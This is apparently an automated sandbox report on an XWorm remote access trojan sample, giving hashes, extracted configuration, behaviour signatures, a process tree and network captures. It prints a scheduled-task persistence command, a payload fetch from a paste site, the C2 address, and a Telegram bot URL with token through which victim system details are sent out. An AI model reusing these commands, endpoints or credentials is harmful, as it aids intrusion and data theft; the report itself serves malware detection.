Overview

overview

10

Static

static

3

84d354f701...0N.exe

windows7-x64

3

84d354f701...0N.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    110s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/01/2025, 05:48 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe

  • Size

    9KB

  • MD5

    0df8781dad511830d4722e2f140f6c60

  • SHA1

    e69045c7a0270aff84dafcd813c05ffbb4c7a20c

  • SHA256

    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450

  • SHA512

    653e7550359149b2e383b360a83f0e2bda7e1f14e2e23c8c7296e1c5f865bb83599d550b916c8d2dd6afbef072a17f119f03bc33c51cdf7ce9abb70caf24f3eb

  • SSDEEP

    192:kmGhMITEquCA/a1zbhQ5rycbXfrxQNsWkhbv8EFm/Q:km7rquN/a1zbIryePraXkhIl/

Score
10/10
xwormdiscoveryrattrojan

Malware Config

Extracted

Family

xworm

C2

147.185.221.25:18007

Attributes
  • Install_directory

    %AppData%

  • install_file

    svc.exe

  • telegram

    https://api.telegram.org/bot7958612105:AAHSNEPMuFgiaNh4WYBmEL8ysE2Ek6JH2i4/sendMessage?chat_id=8093935255

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe
    "C:\Users\Admin\AppData\Local\Temp\84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3240
    • C:\Users\Admin\AppData\Local\Temp\dropped.exe
      "C:\Users\Admin\AppData\Local\Temp\dropped.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:396
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svc" /tr "C:\Users\Admin\AppData\Roaming\svc.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4008
  • C:\Users\Admin\AppData\Roaming\svc.exe
    C:\Users\Admin\AppData\Roaming\svc.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2764
  • C:\Users\Admin\AppData\Roaming\svc.exe
    C:\Users\Admin\AppData\Roaming\svc.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4428

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    dpaste.com
    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe
    Remote address:
    8.8.8.8:53
    Request
    dpaste.com
    IN A
    Response
    dpaste.com
    IN CNAME
    webapp-837091.pythonanywhere.com
    webapp-837091.pythonanywhere.com
    IN A
    35.173.69.207
  • flag-us
    GET
    https://dpaste.com/997T8TTWV.txt
    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe
    Remote address:
    35.173.69.207:443
    Request
    GET /997T8TTWV.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Host: dpaste.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 21 Jan 2025 05:48:21 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 165248
    Connection: keep-alive
    Vary: Accept-Encoding
    Vary: Cookie, origin
    X-Clacks-Overhead: GNU Terry Pratchett
    Server: PythonAnywhere
  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    207.69.173.35.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    207.69.173.35.in-addr.arpa
    IN PTR
    Response
    207.69.173.35.in-addr.arpa
    IN PTR
    ec2-35-173-69-207 compute-1 amazonawscom
  • flag-us
    DNS
    136.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    136.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    167.173.78.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.173.78.104.in-addr.arpa
    IN PTR
    Response
    167.173.78.104.in-addr.arpa
    IN PTR
    a104-78-173-167deploystaticakamaitechnologiescom
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ip-api.com
    dropped.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    dropped.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 21 Jan 2025 05:48:26 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-apicom
  • flag-us
    DNS
    api.telegram.org
    dropped.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    GET
    https://api.telegram.org/bot7958612105:AAHSNEPMuFgiaNh4WYBmEL8ysE2Ek6JH2i4/sendMessage?chat_id=8093935255&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ACD4BBD0C1490E06B5277%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20Tester
    dropped.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot7958612105:AAHSNEPMuFgiaNh4WYBmEL8ysE2Ek6JH2i4/sendMessage?chat_id=8093935255&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ACD4BBD0C1490E06B5277%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20Tester HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Tue, 21 Jan 2025 05:48:30 GMT
    Content-Type: application/json
    Content-Length: 73
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    167.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.190.18.2.in-addr.arpa
    IN PTR
    Response
    167.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-167deploystaticakamaitechnologiescom
  • flag-us
    DNS
    60.153.16.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    60.153.16.2.in-addr.arpa
    IN PTR
    Response
    60.153.16.2.in-addr.arpa
    IN PTR
    a2-16-153-60deploystaticakamaitechnologiescom
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.236.111.52.in-addr.arpa
    IN PTR
    Response
  • 35.173.69.207:443
    https://dpaste.com/997T8TTWV.txt
    tls, http
    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe
    3.6kB
     174.2kB
     69
    130

    HTTP Request

    GET https://dpaste.com/997T8TTWV.txt

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    dropped.exe
    310 B
     347 B
     5
    4

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot7958612105:AAHSNEPMuFgiaNh4WYBmEL8ysE2Ek6JH2i4/sendMessage?chat_id=8093935255&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ACD4BBD0C1490E06B5277%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20Tester
    tls, http
    dropped.exe
    1.3kB
     6.7kB
     11
    12

    HTTP Request

    GET https://api.telegram.org/bot7958612105:AAHSNEPMuFgiaNh4WYBmEL8ysE2Ek6JH2i4/sendMessage?chat_id=8093935255&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ACD4BBD0C1490E06B5277%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20Tester

    HTTP Response

    400
  • 147.185.221.25:18007
    dropped.exe
    260 B
     5
  • 147.185.221.25:18007
    dropped.exe
    260 B
     5
  • 147.185.221.25:18007
    dropped.exe
    260 B
     5
  • 147.185.221.25:18007
    dropped.exe
    260 B
     5
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    dpaste.com
    dns
    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe
    56 B
     115 B
     1
    1

    DNS Request

    dpaste.com

    DNS Response

    35.173.69.207

  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
     147 B
     1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    207.69.173.35.in-addr.arpa
    dns
    72 B
     127 B
     1
    1

    DNS Request

    207.69.173.35.in-addr.arpa

  • 8.8.8.8:53
    136.32.126.40.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    136.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    167.173.78.104.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    167.173.78.104.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    dropped.exe
    56 B
     72 B
     1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
     95 B
     1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    dropped.exe
    62 B
     78 B
     1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
     167 B
     1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    167.190.18.2.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    167.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    60.153.16.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    60.153.16.2.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    22.236.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    22.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svc.exe.log
    Filesize

    654B

    MD5

    2ff39f6c7249774be85fd60a8f9a245e

    SHA1

    684ff36b31aedc1e587c8496c02722c6698c1c4e

    SHA256

    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

    SHA512

    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\dropped.exe
    Filesize

    60KB

    MD5

    3e9e3e8558100fe6532454253899a35c

    SHA1

    780a48407f1cdcc4f485077775e032e0322eaaad

    SHA256

    7be4bfd44ef825613565447e94c63af4e359221417babb5577fae8a62b683541

    SHA512

    e5c4dc9aa37c6d82a069a0edcc8537604f1440eb003a5d2b21aa103497b17ae80a48bb881e64a0010a9a45b481824be8f51dfdbe071b33cd316cc23a70379051

    Download Submit

  • memory/396-15-0x00007FFA99F63000-0x00007FFA99F65000-memory.dmp

    Filesize

    8KB

    Download

  • memory/396-17-0x0000000000BF0000-0x0000000000C06000-memory.dmp

    Filesize

    88KB

    Download

  • memory/396-19-0x00007FFA99F60000-0x00007FFA9AA21000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/396-21-0x00007FFA99F60000-0x00007FFA9AA21000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-0-0x000000007492E000-0x000000007492F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3240-1-0x0000000000950000-0x0000000000958000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3240-2-0x00000000058B0000-0x0000000005E54000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3240-3-0x0000000074920000-0x00000000750D0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3240-16-0x0000000006860000-0x00000000068F2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/3240-18-0x0000000074920000-0x00000000750D0000-memory.dmp

    Filesize

    7.7MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.